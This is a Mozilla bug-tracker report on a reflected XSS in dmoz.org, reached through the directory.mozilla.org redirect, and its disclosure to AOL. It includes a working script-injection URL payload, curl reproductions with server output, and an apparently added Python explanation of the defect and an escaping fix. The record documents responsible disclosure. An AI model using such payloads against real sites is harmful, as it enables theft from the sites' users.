Closed
Bug 1329483
Opened 8 years ago
Closed 8 years ago
example xss in directory.mozilla.org
Categories
(Websites :: Other, defect)
Tracking
(Not tracked)
RESOLVED
FIXED
People
(Reporter: honcbb, Unassigned)
Details
(Keywords: reporter-external, sec-moderate, wsec-xss, Whiteboard: [reporter-external] [web-bounty-form] [verif?])
Attachments
(2 files)
Firefox, IE Payload: http://www.dmoz.org/public/abuse?t=arts&cat=Arts/Television&lang=en%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
directory.mozilla.org 302 > http://www.dmoz.org/
Flags: sec-bounty?
Comment 1•8 years ago
# directory.mozilla.org redirects to www.dmoz.org
$ curl -i directory.mozilla.org
HTTP/1.1 302 Found
Server: Apache
X-Backend-Server: pp-web03
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 09 Jan 2017 14:28:13 GMT
Location: http://www.dmoz.org/
X-Cache-Info: not cacheable; response is 302 without expiry time
Content-Length: 204
# Results in a reflected XSS payload like so...
$ curl -i 'http://www.dmoz.org/public/abuse?t=arts&cat=Arts/Television&lang=en%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
HTTP/1.1 200 OK
Date: Mon, 09 Jan 2017 14:29:51 GMT
Server: Apache
...SNIP...
Content-Language: en-US
Content-Length: 9330
Connection: close
Content-Type: text/html;charset=UTF-8
...SNIP...
<input type="hidden" name="lang" value=en"><script>alert(document.domain)</script> ></input>
...SNIP...
Status: UNCONFIRMED → NEW
Ever confirmed: true
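The response above shows the `lang` query value dropped into an unquoted attribute with no encoding, so a `"` followed by `>` closes the tag and whatever follows is parsed as markup. As an added example (not code from the report or from dmoz.org; the function names are assumptions), the defective rendering is placed beside a hardened version, and a parser-based check confirms that the encoded value can no longer leave the attribute:

```python
import html
from html.parser import HTMLParser

# Constructed input: the URL-decoded `lang` value from the bug report.
PAYLOAD = 'en"><script>alert(document.domain)</script>'


def render_lang_input_vulnerable(lang: str) -> str:
    """Reproduces the defect seen in the response: the query value lands in an
    unquoted attribute with no encoding, so '"' or '>' ends the tag early."""
    return f'<input type="hidden" name="lang" value={lang} ></input>'


def render_lang_input_safe(lang: str) -> str:
    """Hardened form: always quote the attribute and HTML-encode the value
    (&, <, >, " and ' are replaced) so it can only ever be attribute text."""
    return f'<input type="hidden" name="lang" value="{html.escape(lang, quote=True)}">'


class _TagCollector(HTMLParser):
    """Records every start tag and its attributes, roughly as a browser sees them."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(markup: str):
    """Return [(tag_name, {attr: value}), ...] for every start tag in markup."""
    p = _TagCollector()
    p.feed(markup)
    p.close()
    return p.tags


def reflects_safely(render, lang: str) -> bool:
    """True when the rendered markup is exactly one <input> whose 'value'
    round-trips to the original string, i.e. no tag was injected."""
    tags = parse_tags(render(lang))
    return len(tags) == 1 and tags[0][0] == "input" and tags[0][1].get("value") == lang
```

The same parser check can be run over a page fetched with a benign marker value (for example `lang=en"marker`) to detect this class of reflection without alerting anything.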
Comment 2•8 years ago
Comment 3•8 years ago
This is a valid reflected XSS payload for this site. There is a login for the page, but I'm not sure whether we have a large number of users visiting the site. Setting the severity to moderate for the time being.
Keywords: sec-moderate, wsec-xss
Comment 4•8 years ago
Is this a Mozilla site? I know we redirect there, but I believe it's owned and operated by AOL.
Comment 5•8 years ago
It was once known as directory.mozilla.org, but it's owned by AOL; it's not ours. April's right.
The XSS works through the redirect as well.
Given that we don't control the site, I'm not sure we should be 302-ing to it given possible reputational risk. We all know the technical risks, but this is a policy question we should probably kick to the bounty meeting.
$ curl -i "http://directory.mozilla.org/public/abuse?t=arts&cat=Arts/Television&lang=en%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
HTTP/1.1 302 Found
Server: Apache
X-Backend-Server: pp-web01
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 09 Jan 2017 16:38:38 GMT
Location: http://www.dmoz.org/public/abuse?t=arts&cat=Arts/Television&lang=en%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
X-Cache-Info: not cacheable; response is 302 without expiry time
Content-Length: 312
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.dmoz.org/public/abuse?t=arts&cat=Arts/Television&lang=en%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E">here</a>.</p>
</body></html>
Comment 6•8 years ago
This is not our site, we might take away the redirect and alert security@aol.com to let them know about this issue.
Flags: sec-bounty? → sec-bounty-
Comment 7•8 years ago
:fox2mike - would it be possible to get stats on how many DNS queries we get for directory.mozilla.org? Trying to establish a metric to suggest whether it's in use or not since it redirects to a site operated by AOL.
Also, I'm sending AOL security an email now to alert them of the reflected XSS.
Updated•8 years ago
Flags: needinfo?(smani)
Comment 8•8 years ago
The AOL Security team has responded, confirmed the XSS issue on their end, and is working with their internal teams to resolve it. If they provide any other updates, I'll capture them in this bug.
Honc: in case it wasn't clear earlier, I credited you in the email I sent to AOL Security in case they would like to offer you a bounty or HoF mention. Thanks again for the report!
Comment 10 (Reporter)•8 years ago
Because I got to directory.Mozilla.org through the Google search engine ("site:*.Mozilla.org"), and it 302'd into http://www.DMOZ.org/
Comment 11 (Reporter)•8 years ago
I find that this vulnerability has been fixed, does the team have any response?
Comment 12•8 years ago
I have confirmed the original PoC for the XSS issue appears to have been fixed by AOL's security team.
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
Comment 13 (Reporter)•8 years ago
OK, thanks.
Comment 14 (Reporter)•8 years ago
Hey Mozilla Firefox Security Team,
Asking again!
This problem has been patched for a while now; does the AOL team say anything about a reward?
Comment 15•8 years ago
Honc: I'll CC you into the email thread with AOL so you can ask them about a bounty.
Comment 16 (Reporter)•8 years ago
OK, thank you.
Comment 17•8 years ago
Honc was acknowledged on AOL's Security Hall of Fame for this issue:
https://contact.security.aol.com/hof/
Updated•8 years ago
Group: websites-security
Flags: needinfo?(smani)
Comment 18 (Reporter)•8 years ago
OK, I know. Thank you very much~
Updated•1 year ago
Keywords: reporter-external